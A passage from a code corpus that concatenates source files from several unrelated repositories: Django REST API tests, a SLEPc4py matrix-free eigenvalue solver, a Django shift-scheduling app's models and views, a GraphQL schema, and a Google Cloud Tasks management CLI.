return obj.user == request.user
```
#### File: djangorest/api/tests.py
```python
from django.test import TestCase
#from .models import Recommendation, User
from django.contrib.auth.models import User
from .models import Recommendation
from rest_framework.test import APIClient
from rest_framework import status
from django.urls import reverse
# Create your tests here.
class ModelTestCase(TestCase):
"""This class defines the test suite for the recommendation model."""
def setUp(self):
"""Define the test client and other test variables."""
self.user = User.objects.create(username="nerd") # ADD THIS LINE
self.title = "Write world class code"
        # specify the owner of the recommendation
self.recommendation = Recommendation(title=self.title, owner=self.user) # EDIT THIS TOO
# def setUp(self):
# """Define the test client and other test variables."""
# self.title = "Test Recommendation"
# self.username = "TestUser"
# self.user = User(username="TestUser")
def test_model_can_create_user_and_a_recommendation(self):
"""Test the Recommendation model can create a recommendation."""
old_count = Recommendation.objects.count()
self.recommendation.save()
new_count = Recommendation.objects.count()
self.assertNotEqual(old_count, new_count)
# Define this after the ModelTestCase
class ViewTestCase(TestCase):
"""Test suite for the api views."""
def setUp(self):
"""Define the test client and other test variables."""
self.user = User.objects.create(username="nerd") # ADD THIS LINE
self.client = APIClient()
self.client.force_authenticate(user=self.user)
self.title = "Write world class code"
#self.recommendation = Recommendation(title=self.title)
self.recommendation_data = {'title': 'Go to Ibiza', 'comment': 'Go to Ibiza' ,'reference': 'Go to Ibiza','owner': self.user.id}
self.response = self.client.post(
reverse('create'),
self.recommendation_data,
format="json")
self.recommendation = Recommendation.objects.get(title='Go to Ibiza')
def test_api_can_create_a_recommendation(self):
"""Test the api has recommendation creation capability."""
self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
def test_api_can_get_a_recommendation(self):
"""Test the api can get a given recommendation."""
recommendation = Recommendation.objects.get()
response = self.client.get(
'/recommendation/',
kwargs={'pk': recommendation.id}, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertContains(response, recommendation)
def test_api_can_delete_recommendation(self):
"""Test the api can delete a recommendation."""
#recommendation = Recommendation.objects.get()
response = self.client.delete(
reverse('details', kwargs={'pk': self.recommendation.id}),
format='json',
follow=True)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_api_can_update_recommendation(self):
"""Test the api can update a given recommendation."""
#recommendation = Recommendation.objects.get()
change_recommendation = {'title': 'Go to Ibiza', 'comment': 'Go to Ibiza' ,'reference': 'Go to Ibiza'}
res = self.client.put(
reverse('details', kwargs={'pk': self.recommendation.id}),
change_recommendation, format='json'
)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_authorization_is_enforced(self):
"""Test that the api has user authorization."""
new_client = APIClient()
res = new_client.get('/recommendation/', kwargs={'pk': 1}, format="json")
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
``` |
{
"source": "JJorgeDSIC/ML_PORTAL_CONCEPT",
"score": 2
} |
#### File: ml_portal/portal/utils.py
```python
import csv
import re
import os
import numpy as np
from django.core.files.storage import default_storage
from django.core.files.base import ContentFile
from django.conf import settings
def get_upload_training_path(instance, filename):
return "{path}/data/train/{filename}".format(path=instance.path, item_id=instance.id,filename=filename)
def get_upload_test_path(instance, filename):
return "{path}/data/test/{filename}".format(path=instance.path, item_id=instance.id,filename=filename)
def validate_csv(data):
#print data
return True
# tmp = os.path.join(settings.MEDIA_ROOT, "tmp", data.name)
# path = default_storage.save(tmp, ContentFile(data.read()))
# print path
# f = open(path, 'r')
# #print re.split(r'[\n\r]+', data)
# data_str = f.read()
# lines = filter(None, re.split("[\n]+", data_str))
# rows = [filter(None, re.split("[,;]+", l)) for l in lines]
# f.close()
# os.remove(path)
# print "SAMPLES: " + str(len(rows))
# print "FIELDS: " + str(len(rows[0]))
# print "SOME SAMPLES: "
# print rows[0:10]
# registers = np.array(rows)
# print registers
# labels = set(registers[:,-1])
# print labels
# f = open(path, 'r')
# lines = f.readlines()
# lines = [l.strip() for l in lines ]
# #print lines
# one_row = filter(None, re.split("[,;]+", lines[0]))
# print "SAMPLES: " + str(len(lines))
# print "FIELDS: " + str(len(one_row))
# print filter(None, re.split("[,;]+", lines[0]))
# f.close()
# os.remove(path)
# reader = csv.reader(data)
# samples = reader.line_num
# print "There are " + str(samples) + " samples."
# for row in reader:
# print row
# for element in row:
# if element == '':
# return False
# f = open(data, 'r')
# lines = f.readlines()
# print lines[0]
    # I left off here ("AQUI ME QUEDE")
# f = open(data, 'r')
# SEPARATOR =","
# lines = data.split("\n")
# samples = len(lines)
# print "SAMPLES: " + str(samples)
# if samples > 0:
# fields = len(lines[0].split(SEPARATOR))
# print lines[0].split(SEPARATOR)
# print "FIELDS: " + str(fields)
# for line in lines:
# print line[:-1]
# tokens = line[:-1].split(SEPARATOR)
# for token in tokens:
# print token
# if token == '':
# return False
#return True
``` |
{
"source": "JJorgeDSIC/ShellMatrixExampleSLEPc4py",
"score": 2
} |
#### File: ShellMatrixExampleSLEPc4py/code/shell_matrix_example_phi1.py
```python
import sys, slepc4py
slepc4py.init(sys.argv)
from petsc4py import PETSc
from slepc4py import SLEPc
import numpy as np
Print = PETSc.Sys.Print
class ShellMatrix(object):
def __init__(self, m, n, KL11, KL21, KL22, L21, L22, M11, M12):
self.m, self.n = m, n
scalar = PETSc.ScalarType
self.KL11 = KL11
self.KL21 = KL21
self.KL22 = KL22
self.L21 = L21
self.L22 = L22
self.M11 = M11
self.M12 = M12
self.workvec1, _ = L22.createVecs()
self.workvec2, _ = L22.createVecs()
self.workvec1.set(0)
self.workvec2.set(0)
    def mult(self, A, x, y):
        r"""
        First version: isolating \Phi_1
        """
m, n = self.m, self.n
w1 = self.M12 * x
w2 = self.L22 * x
self.KL21.solve(w2, self.workvec1)
w4 = self.M11 * self.workvec1
w5 = w1 + w4
self.KL11.solve(w5, self.workvec2)
w7 = self.L21 * self.workvec2
self.KL22.solve(w7, y)
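        # Added note (inferred from the solves above, with the M and L21
        # vectors acting pointwise as diagonal matrices): this applies
        #   y = L22^{-1} L21 L11^{-1} (M12 x + M11 L21^{-1} L22 x)
        # without forming any inverse explicitly -- each L^{-1} is a KSP solve.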
def construct_operator(m, n, KL11, KL21, KL22, L21, L22, M11, M12):
# Create shell matrix
context = ShellMatrix(m,n, KL11, KL21, KL22, L21, L22, M11, M12)
A = PETSc.Mat().createPython([m,n], context)
A.setUp()
return A
def solve_eigensystem(A, problem_type=SLEPc.EPS.ProblemType.NHEP):
# Create the result vectors
xr, xi = A.createVecs()
# Setup the eigensolver
E = SLEPc.EPS().create()
E.setOperators(A,None)
E.setDimensions(3,PETSc.DECIDE)
E.setProblemType( problem_type )
E.setFromOptions()
# Solve the eigensystem
E.solve()
Print("")
its = E.getIterationNumber()
Print("Number of iterations of the method: %i" % its)
sol_type = E.getType()
Print("Solution method: %s" % sol_type)
nev, ncv, mpd = E.getDimensions()
Print("Number of requested eigenvalues: %i" % nev)
tol, maxit = E.getTolerances()
Print("Stopping condition: tol=%.4g, maxit=%d" % (tol, maxit))
nconv = E.getConverged()
Print("Number of converged eigenpairs: %d" % nconv)
if nconv > 0:
Print("")
Print(" k ||Ax-kx||/||kx|| ")
Print("----------------- ------------------")
for i in range(nconv):
k = E.getEigenpair(i, xr, xi)
error = E.computeError(i)
if k.imag != 0.0:
Print(" %9f%+9f j %12g" % (k.real, k.imag, error))
else:
Print(" %12f %12g" % (k.real, error))
Print("")
def main():
opts = PETSc.Options()
# load from file
viewer = PETSc.Viewer().createBinary('../matrices/ringhals1.petsc', 'r')
L11 = PETSc.Mat().load(viewer)
L22 = PETSc.Mat().load(viewer)
L21 = PETSc.Vec().load(viewer)
M11 = PETSc.Vec().load(viewer)
M12 = PETSc.Vec().load(viewer)
# create linear solver
KL11 = PETSc.KSP()
KL11.create(PETSc.COMM_WORLD)
# use conjugate gradients
KL11.setType('cg')
    # with no preconditioner
    KL11.getPC().setType('none')
    # set the system operator
KL11.setOperators(L11)
KL11.setFromOptions()
((lr,gr),(lc,gc)) = L11.getSizes()
L21mat = PETSc.Mat();
L21mat.createAIJ(size=L11.getSizes());
L21mat.setFromOptions()
L21mat.setUp()
L21mat.setDiagonal(L21)
L21mat.assemble()
# To fix...
# # create linear solver
KL21 = PETSc.KSP()
KL21.create(PETSc.COMM_WORLD)
# use conjugate gradients
KL21.setType('cg')
    # with no preconditioner
    KL21.getPC().setType('none')
    # set the system operator
KL21.setOperators(L21mat)
KL21.setFromOptions()
# create linear solver
KL22 = PETSc.KSP()
KL22.create(PETSc.COMM_WORLD)
# use conjugate gradients
KL22.setType('cg')
    # with no preconditioner
    KL22.getPC().setType('none')
    # set the system operator
KL22.setOperators(L22)
KL22.setFromOptions()
Print("gr={:}\n".format(gr))
Print("gc={:}\n".format(gc))
Print("lr={:}\n".format(lr))
Print("lc={:}\n".format(lc))
Print("Standard Non-Symmetric Eigenvalue Problem (matrix-free)")
A = construct_operator(gr,gc, KL11, KL21, KL22, L21, L22, M11, M12)
solve_eigensystem(A)
if __name__ == '__main__':
main()
``` |
{
"source": "jjorgewill/schedule",
"score": 2
} |
#### File: apps/core/models.py
```python
import calendar
import datetime
from django.db.models import Q, Sum
from django.db.models.signals import post_save
from django.dispatch import receiver
from model_utils.models import SoftDeletableModel, TimeStampedModel
from schedule.settings import MEDIA_URL
from django.contrib.auth.models import User, Permission
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_str
def get_path_avatar(instance, filename):
return "upload/{0}/avatar/{1}".format(instance.id, smart_str(filename))
class Profession(TimeStampedModel, SoftDeletableModel):
name = models.CharField(max_length=200)
abbreviation = models.CharField(max_length=10)
class Meta:
verbose_name = _("Profession")
verbose_name_plural = _("Professions")
def __str__(self):
return self.name
class Profile(TimeStampedModel, SoftDeletableModel):
user = models.OneToOneField(User, blank=True, null=True, on_delete=models.CASCADE)
phone = models.CharField(max_length=15, blank=True, null=True)
color = models.CharField(max_length=7, blank=True, null=True)
admin = models.NullBooleanField()
avatar = models.FileField(blank=True, null=True, upload_to=get_path_avatar)
profession = models.ForeignKey(Profession, blank=True, null=True, on_delete=models.SET_NULL)
class Meta:
verbose_name = _("Profile")
verbose_name_plural = _("Profiles")
def __str__(self):
if self.user and self.user.first_name:
if self.profession:
return self.profession.abbreviation + ' ' + self.user.first_name
else:
return self.user.first_name
else:
return str(self.id)
def get_time_after_today(self,today):
day = datetime.datetime.now().day
last_day = calendar.monthrange(today.year,today.month)[1]
hours_next = self.event_set.filter(date__month=today.month,
date__year=today.year,
date__day__lte=last_day,
date__day__gte=day,
is_removed=False).distinct().aggregate(
Sum('duration_hours'),Sum('duration_minutes'))
return hours_next
def get_time_before_today(self, today):
day = today.day
hours_before = self.event_set.filter(date__month=today.month,
date__year=today.year,
date__day__lte=day,
date__day__gte=1,
is_removed=False).distinct().aggregate(
Sum('duration_hours'),Sum('duration_minutes'))
return hours_before
def get_time_per_month(self, today):
events_hours = self.event_set.filter(date__month=today.month,
date__year=today.year,
is_removed=False).distinct().aggregate(
Sum('duration_hours'),Sum('duration_minutes'))
return events_hours
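    # Added note: aggregate() returns a dict keyed 'duration_hours__sum' /
    # 'duration_minutes__sum'; both values are None when the profile has no
    # matching events, which callers must guard against.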
def get_time_after_today_per_turn(self,today):
day = datetime.datetime.now().day
last_day = calendar.monthrange(today.year,today.month)[1]
hours_next = self.event_set.filter(date__month=today.month,
date__year=today.year,
date__day__lte=last_day,
date__day__gte=day,
is_removed=False).values('turn__name').annotate(
Sum('duration_hours'),Sum('duration_minutes'))
return hours_next
def get_time_before_today_per_turn(self, today):
day = today.day
hours_before = self.event_set.filter(date__month=today.month,
date__year=today.year,
date__day__lte=day,
date__day__gte=1,
is_removed=False).values('turn__name').annotate(
Sum('duration_hours'),Sum('duration_minutes'))
return hours_before
def get_time_per_month_per_turn(self, today):
events_hours = self.event_set.filter(date__month=today.month,
date__year=today.year,
is_removed=False).values('turn__name').annotate(
Sum('duration_hours'),Sum('duration_minutes'))
return events_hours
@property
def get_avatar(self):
if not self.avatar:
return '/static/app/img/no_user.jpg'
else:
return MEDIA_URL + str(self.avatar)
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
profile = Profile.objects.create(user=instance)
# can_dashboard = Permission.objects.get(codename='can_dashboard')
# can_inbox = Permission.objects.get(codename='can_inbox')
# profile.user.user_permissions.add(can_dashboard)
# profile.user.user_permissions.add(can_inbox)
class Hour(TimeStampedModel, SoftDeletableModel):
start_time = models.TimeField()
end_time = models.TimeField(blank=True, null=True)
class Meta:
verbose_name = _("Hour")
verbose_name_plural = _("Hours")
def __str__(self):
return str(self.start_time)
@property
def as_dict(self):
return {
'start_time': self.start_time,
'end_time': self.end_time
}
@property
def get_amount_time(self):
if self.end_time:
end = datetime.timedelta(hours=self.end_time.hour, minutes=self.end_time.minute)
start = datetime.timedelta(hours=self.start_time.hour, minutes=self.start_time.minute)
return end - start
else:
return 0
class Turn(TimeStampedModel, SoftDeletableModel):
name = models.CharField(max_length=100) # noche,tarde,manana
hour = models.ForeignKey(Hour, blank=True, null=True, on_delete=models.SET_NULL)
duration_hours = models.IntegerField(blank=True, null=True)
duration_minutes = models.IntegerField(blank=True, null=True)
class Meta:
verbose_name = _("Turn")
verbose_name_plural = _("Turns")
ordering = ['hour__start_time']
def __str__(self):
return self.name
@property
def get_amount_hours(self):
return self.duration_hours
@property
def get_amount_minutes(self):
return self.duration_minutes
class Status(models.Model):
name = models.CharField(max_length=100) # planificado,trabajado
class Meta:
verbose_name = _("Status")
verbose_name_plural = _("Statuses")
def __str__(self):
return self.name
class Event(TimeStampedModel, SoftDeletableModel):
date = models.DateField()
turn = models.ForeignKey(Turn, blank=True, null=True, on_delete=models.SET_NULL)
status = models.ForeignKey(Status, on_delete=models.CASCADE, blank=True, null=True) # programed, plaint
profile = models.ForeignKey(Profile, on_delete=models.CASCADE)
duration_hours = models.IntegerField(blank=True, null=True)
duration_minutes = models.IntegerField(blank=True, null=True)
class Meta:
verbose_name = _("Event")
verbose_name_plural = _("Events")
def __str__(self):
        return str(self.date) + ' ' + self.profile.user.first_name
class Holiday(TimeStampedModel, SoftDeletableModel):
day = models.DateField()
class Meta:
verbose_name = _("Holiday")
verbose_name_plural = _("Holidays")
def __str__(self):
return str(self.day)
class NonWorkingDay(TimeStampedModel, SoftDeletableModel):
name = models.CharField(max_length=20)
number_day = models.IntegerField()
class Meta:
verbose_name = _("NonWorkingDay")
verbose_name_plural = _("NonWorkingDays")
def __str__(self):
return self.name
class MotiveAffectation(models.Model):
name = models.CharField(max_length=150)
class Meta:
verbose_name = _("MotiveAffectation")
verbose_name_plural = _("MotiveAffectations")
def __str__(self):
return self.name
class Affectation(TimeStampedModel, SoftDeletableModel):
hour = models.ForeignKey(Hour, blank=True, null=True, on_delete=models.SET_NULL)
motive = models.ForeignKey(MotiveAffectation, blank=True, null=True, on_delete=models.SET_NULL)
comment = models.TextField(blank=True, null=True)
class Feature(models.Model):
menu_item_name = models.CharField(verbose_name=_('Item Name'), max_length=100)
url = models.CharField(verbose_name=_('Url'), max_length=100)
icon = models.CharField(verbose_name=_('Icon'), max_length=100)
position = models.PositiveIntegerField(verbose_name=_('Position'), blank=True, null=True)
child = models.ForeignKey('self', related_name='child_feature', on_delete=models.SET_NULL, blank=True, null=True)
permission = models.ManyToManyField(Permission)
class Meta:
verbose_name = _("Feature")
verbose_name_plural = _("Features")
def __str__(self):
return self.menu_item_name
```
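Before moving to the views, a quick illustrative sketch of how these models compose: `Hour.get_amount_time` yields a `timedelta`, and its string form ("8:30:00") is what the views below split to fill `Turn.duration_hours`/`duration_minutes`. This is a hedged usage example, assuming the app is importable as `apps.core`:
```python
# Illustrative only; assumes the models above live in apps.core.models.
import datetime
from apps.core import models

morning = models.Hour.objects.create(start_time=datetime.time(8, 0),
                                     end_time=datetime.time(16, 30))
delta = morning.get_amount_time             # timedelta(hours=8, minutes=30)
hours, minutes = str(delta).split(":")[:2]  # "8:30:00" -> "8", "30"
turn = models.Turn.objects.create(name="morning", hour=morning,
                                  duration_hours=int(hours),
                                  duration_minutes=int(minutes))
```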
#### File: apps/core/views.py
```python
from datetime import timedelta
from django.utils import timezone
from django.contrib import messages
from django.contrib.auth.models import User
from django.db.models import Q
from django.http import HttpResponseRedirect, JsonResponse
from django.shortcuts import render
from django.urls import reverse
from django.views import generic
from apps.core import models, forms
from django.utils.translation import ugettext_lazy as _
from apps.core.mixin import Security
from apps.core.utils import generate, date_range
from schedule.settings import EMAIL_HOST_USER
class RouterView(Security, generic.RedirectView):
pattern_name = 'view_dashboard'
def get_redirect_url(self, *args, **kwargs):
profile = self.request.user.profile
        if profile.admin:
            return reverse('view_dashboard')
        return super().get_redirect_url(*args, **kwargs)
# Event
class CalendarView(Security, generic.CreateView):
template_name = 'events/form_event.html'
form_class = forms.EventForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
profiles = models.Profile.objects.filter(is_removed=False).exclude(user__is_staff=True).order_by('-id')
info_profile = []
today = timezone.now()
for p in profiles:
hour = p.get_time_per_month(today)
before = p.get_time_before_today(today)
last = p.get_time_after_today(today)
time_after_today_per_turn = p.get_time_after_today_per_turn(today)
time_before_today_per_turn = p.get_time_before_today_per_turn(today)
time_per_month_per_turn = p.get_time_per_month_per_turn(today)
            if hour['duration_hours__sum'] and before['duration_hours__sum']:
                percent = int(float(before['duration_hours__sum']) / float(hour['duration_hours__sum']) * 100)
            else:
                percent = 0
            info_profile.append({'hours': hour['duration_hours__sum'], 'minutes': hour['duration_minutes__sum'],
                                 'name': p.user.first_name, 'last_name': p.user.last_name,
                                 'color': p.color,
                                 'percent': percent,
                                 'time_after_today_per_turn': time_after_today_per_turn,
                                 'time_before_today_per_turn': time_before_today_per_turn,
                                 'time_per_month_per_turn': time_per_month_per_turn,
                                 'hour_before_day': before['duration_hours__sum'],
                                 'minutes_before_day': before['duration_minutes__sum'],
                                 'hour_last_day': last['duration_hours__sum'],
                                 'minutes_last_day': last['duration_minutes__sum'],
                                 })
context['profiles'] = info_profile
return context
def form_valid(self, form):
obj_event = form.save(commit=False)
date_start = form.cleaned_data.get('date_start')
date_end = form.cleaned_data.get('date_end')
turn = form.cleaned_data.get('turn')
profile = form.cleaned_data.get('profile')
next_day = date_start + timedelta(1)
if next_day != date_end:
list_event = []
for day in date_range(date_start, date_end):
event = models.Event()
event.date = day
event.turn = turn
event.profile = profile
event.duration_hours = turn.duration_hours
event.duration_minutes = turn.duration_minutes
list_event.append(event)
if list_event:
models.Event.objects.bulk_create(list_event)
else:
event = models.Event()
event.date = date_start
event.turn = turn
event.profile = profile
event.duration_hours = turn.duration_hours
event.duration_minutes = turn.duration_minutes
event.save()
        messages.success(self.request, _('This event has been saved'))
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
return reverse('create_calendar')
# Turns
class TurnsCreateView(Security, generic.CreateView):
template_name = 'turns/form_turn.html'
# permission_required = 'core.can_create_turns'
form_class = forms.TurnForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
def form_valid(self, form):
turn = form.save(commit=False)
hour = form.cleaned_data.get('hour')
duracion = str(hour.get_amount_time).split(":")
turn.duration_hours = duracion[0]
turn.duration_minutes = duracion[1]
turn.save()
        messages.success(self.request, _('This turn has been saved'))
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
return reverse('create_turns')
class TurnsView(Security, generic.ListView):
template_name = 'turns/view_turn.html'
model = models.Turn
context_object_name = 'turns'
class GetTurnsView(Security, generic.ListView):
template_name = 'turns/view_turn.html'
model = models.Turn
context_object_name = 'turns'
def get(self, request, *args, **kwargs):
date = request.GET.get('date').split('-')
year = int(date[1])
month = int(date[0])
events = models.Event.objects.filter(date__month=month,
date__year=year, is_removed=False).distinct()
data = []
for obj in events:
abbreviation = obj.profile.profession.abbreviation if obj.profile.profession else ""
data.append({
'title': obj.turn.name + " " + abbreviation + " " + obj.profile.user.first_name,
'start': obj.date.strftime('%Y-%m-%d'),
'end': obj.date.strftime('%Y-%m-%d'),
'color': obj.profile.color,
'profile': obj.profile.id,
'id': obj.id,
})
return JsonResponse({'status': True, 'data': data})
# Profile
class ProfilesCreateView(Security, generic.CreateView):
template_name = 'profiles/form_profile.html'
# permission_required = 'core.can_view_clients'
form_class = forms.ProfileForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
profile = self.request.user.profile
context.update({'title': _("Create profile")})
context.update(
{'profiles': models.Profile.objects.filter(is_removed=False).exclude(user__is_staff=True).order_by('-id')
.exclude(id=profile.id)})
return context
def form_valid(self, form):
obj_form = form.save(commit=False)
email = form.data.get('email')
user = User.objects.filter(email=email).first()
if not user:
user = User()
user.first_name = form.data.get('first_name')
user.last_name = form.data.get('last_name')
user.email = email
user.username = email
password = <PASSWORD>()
user.set_password(password)
user.save()
# add_permission_customer(user)
# send_mail('backend/email/create_user.tpl', {'password': password, 'user': email,
# 'accountant': self.request.user.first_name},
# EMAIL_HOST_USER, [form.data.get('email')])
profile = models.Profile.objects.get(user__email=email)
profile.phone = form.cleaned_data.get('phone')
profile.profession = form.cleaned_data.get('profession')
profile.avatar = form.files.get('avatar')
profile.color = form.cleaned_data.get('color')
profile.save()
        messages.success(self.request, _('This profile has been saved'))
return HttpResponseRedirect(self.get_success_url())
def form_invalid(self, form):
        messages.error(self.request, _('We are sorry, some attributes require your attention'))
return self.render_to_response(self.get_context_data(form=form))
def get_success_url(self):
return reverse('create_profiles')
class ProfilesUpdateView(Security, generic.UpdateView):
template_name = 'profiles/form_profile.html'
model = models.Profile
# permission_required = 'core.can_view_clients'
form_class = forms.ProfileForm
def get_initial(self):
return {
'first_name': self.object.user.first_name,
'last_name': self.object.user.last_name,
'phone': self.object.phone,
'email': self.object.user.email,
}
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
profile = self.request.user.profile
context.update({'title': _("Create profile")})
context.update(
{'profiles': models.Profile.objects.filter(is_removed=False).exclude(user__is_staff=True).order_by('-id')
.exclude(id=profile.id)})
return context
def form_valid(self, form):
obj_form = form.save(commit=False)
email = form.data.get('email')
user = User.objects.filter(email=email).first()
if user:
user.first_name = form.data.get('first_name')
user.last_name = form.data.get('last_name')
user.email = email
user.username = email
user.save()
profile = models.Profile.objects.get(user__email=email)
profile.phone = form.cleaned_data.get('phone')
profile.profession = form.cleaned_data.get('profession')
profile.avatar = form.files.get('avatar')
profile.color = form.cleaned_data.get('color')
profile.save()
        messages.success(self.request, _('This profile has been saved'))
return HttpResponseRedirect(self.get_success_url())
def form_invalid(self, form):
        messages.error(self.request, _('We are sorry, some attributes require your attention'))
return self.render_to_response(self.get_context_data(form=form))
def get_success_url(self):
return reverse('update_profiles', kwargs={'pk': self.kwargs.get('pk')})
class ProfilesView(Security, generic.ListView):
template_name = 'profiles/view_profile.html'
model = models.Profile
context_object_name = 'profiles'
def get_queryset(self):
return models.Profile.objects.filter(is_removed=False).exclude(user__is_staff=True).order_by('-id')
# Hour
class HoursCreateView(Security, generic.CreateView):
template_name = 'hours/form_hour.html'
# permission_required = 'core.can_view_clients'
form_class = forms.HourForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
def form_valid(self, form):
return super().form_valid(form)
def get_success_url(self):
        return reverse('create_hours')
class HoursView(Security, generic.ListView):
template_name = 'hours/view_hour.html'
model = models.Hour
context_object_name = 'hours'
# Holiday
class HolidaysCreateView(Security, generic.CreateView):
template_name = 'holidays/form_holiday.html'
# permission_required = 'core.can_view_clients'
form_class = forms.HolidayForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
def form_valid(self, form):
return super().form_valid(form)
def get_success_url(self):
return reverse('create_holidays')
class HolidaysView(Security, generic.ListView):
template_name = 'holidays/view_holiday.html'
model = models.Holiday
context_object_name = 'holidays'
# Profession
class ProfessionsCreateView(Security, generic.CreateView):
template_name = 'professions/form_profession.html'
# permission_required = 'core.can_view_clients'
form_class = forms.ProfessionForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
def form_valid(self, form):
return super().form_valid(form)
def get_success_url(self):
return reverse('create_professions')
class ProfessionsView(Security, generic.ListView):
template_name = 'professions/view_profession.html'
model = models.Profession
context_object_name = 'professions'
def get_queryset(self):
return models.Profession.objects.filter(is_removed=False).order_by('-id')
# dash
class Dashboard(Security, generic.TemplateView):
template_name = 'dashboard.html'
``` |
{
"source": "jjorgewill/template-resources-micro-service",
"score": 2
} |
#### File: apps/core/schema.py
```python
from apps.core import models
import graphene
from graphene_django.types import DjangoObjectType
class CompanyType(DjangoObjectType):
class Meta:
model = models.Company
class ProfileType(DjangoObjectType):
class Meta:
model = models.Profile
class Query(object):
all_companies = graphene.List(CompanyType)
all_profiles = graphene.List(ProfileType)
def resolve_all_companies(self, info, **kwargs):
return models.Company.objects.all()
def resolve_all_profiles(self, info, **kwargs):
return models.Profile.objects.all()
``` |
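As a hedged usage sketch (not part of the repository), the `Query` mixin above would typically be composed into a root schema; graphene converts the snake_case fields to camelCase in the query language:
```python
# Hypothetical composition of the Query mixin into an executable schema.
import graphene
from apps.core.schema import Query as CoreQuery

class RootQuery(CoreQuery, graphene.ObjectType):
    pass

schema = graphene.Schema(query=RootQuery)
result = schema.execute("{ allCompanies { id } allProfiles { id } }")
print(result.data)
```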
{
"source": "jjorissen52/django-cloud-tasks",
"score": 2
} |
#### File: django-cloud-tasks/cloud_tasks/cli.py
```python
if __name__ == '__main__':
import os
import sys
from django import setup
sys.path.insert(0, os.path.abspath(os.getcwd()))
try:
setup()
except ModuleNotFoundError as e:
raise ModuleNotFoundError(
f"Your django project settings could not be imported. The indicated settings module is "
f"{os.environ['DJANGO_SETTINGS_MODULE']}, and you executed cloud-tasks from the directory "
f"{os.path.abspath(os.getcwd())}. Please make sure that the relative path from your "
f"current working directory as indicated by DJANGO_SETTINGS_MODULE is accurate.")
import subprocess
from django.db.models import Q
from django.contrib.auth import get_user_model
import cloud_tasks.models as models
from cloud_tasks import gtasks, conf
from cloud_tasks.utils import hardcode_reverse
from cloud_tasks.openid import create_token, decode_token
User = get_user_model()
class CloudTasks:
class tasks:
@staticmethod
def list(offset=0, limit=100):
return list(models.Task.objects.values('name')[offset:limit])
@staticmethod
def exec(name: str):
return f'{models.Task.objects.get(name=name).execute()} ' \
f'- {hardcode_reverse("admin:cloud_tasks_taskexecution_changelist")}'
class steps:
@staticmethod
def list(offset=0, limit=100, task=None):
q = Q() if not task else Q(task__name__iexact=task)
return list(
models.Step.objects.filter(q).values(
"name", "action", "id",
"payload", "success_pattern",
"task_id", "task__name"
)[offset:limit]
)
@staticmethod
def exec(name: str):
return f'{models.Step.objects.get(name=name).execute()} ' \
f'- {hardcode_reverse("admin:cloud_tasks_taskexecution_changelist")}'
class executions:
@staticmethod
def list(offset=0, limit=100, task=None):
q = Q() if not task else Q(task__name__iexact=task)
return list(
models.TaskExecution.objects.filter(q).values(
"id",
"results",
"status",
"task__name",
"task_id",
)[offset:limit]
)
class schedules:
@staticmethod
def list(offset=0, limit=100, clock=None, task=None):
q = Q()
if clock:
q &= Q(clock__name__iexact=clock)
if task:
q &= Q(task__name__iexact=task)
return list(
models.TaskSchedule.objects.filter(q).values(
"id",
"name",
"enabled",
"clock__name",
"clock_id",
"clock__cron",
"task__name",
"task_id"
)[offset:limit]
)
@staticmethod
def exec(name: str):
return f'{models.TaskSchedule.objects.get(name=name).run()} ' \
f'- {hardcode_reverse("admin:cloud_tasks_taskexecution_changelist")}'
class clocks:
@staticmethod
def list(offset=0, limit=100):
return list(models.Clock.objects.values(
'name',
'cron',
'management',
'status'
)[offset:limit])
@staticmethod
def tick(name: str):
return models.Clock.objects.get(name=name).tick()
@staticmethod
def start(name: str):
_, message = models.Clock.objects.get(name=name).start_clock()
return message
@staticmethod
def pause(name: str):
_, message = models.Clock.objects.get(name=name).pause_clock()
return message
@staticmethod
def delete(name: str):
_, message = models.Clock.objects.get(name=name).delete_clock()
return message
@staticmethod
def sync(name: str):
_, message = models.Clock.objects.get(name=name).sync_clock()
return message
class schedules:
@staticmethod
def list(offset=0, limit=100, clock=None, task=None):
q = Q()
if clock:
q &= Q(clock__name__iexact=clock)
if task:
q &= Q(task__name__iexact=task)
return list(
models.TaskSchedule.objects.filter(q).values(
"id",
"name",
"enabled",
"clock__name",
"clock_id",
"clock__cron",
"task__name",
"task_id"
)[offset:limit]
)
class auth:
class open_id:
class tokens:
@staticmethod
def create(audience):
return create_token(audience)
@staticmethod
def decode(token, audience=None):
return decode_token(token, audience)
class accounts:
@staticmethod
def register(email: str):
try:
User.objects.get(email__iexact=email)
return f'User for service account {email} already exists.'
except User.DoesNotExist:
User.objects.create(email=email, username=email)
return f'Created User for service account {email}.'
@staticmethod
def delete(email: str):
try:
User.objects.filter(email__iexact=email).delete()
return f'Deleted User for service account {email}'
except User.DoesNotExist:
return f'User for service account {email} does not exist.'
class cloud:
class account:
@staticmethod
def grant_required_roles(email: str):
cmd_template = "gcloud projects add-iam-policy-binding {PROJECT_ID} " \
"--member serviceAccount:{email} --role {role}"
roles = [
'roles/cloudtasks.admin',
'roles/cloudscheduler.admin',
'roles/cloudfunctions.invoker',
]
for role in roles:
cmd = cmd_template.format(PROJECT_ID=conf.PROJECT_ID, email=email, role=role)
process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if stdout:
sys.stdout.write(f'{stdout.decode()}\n')
if stderr:
sys.stderr.write(f'{stderr.decode()}\n')
sys.stdout.flush()
sys.stderr.flush()
class tasks:
list = staticmethod(gtasks.list_tasks)
create = staticmethod(gtasks.create_task)
delete = staticmethod(gtasks.delete_task)
def main():
import fire
fire.Fire(CloudTasks)
if __name__ == '__main__':
main()
``` |
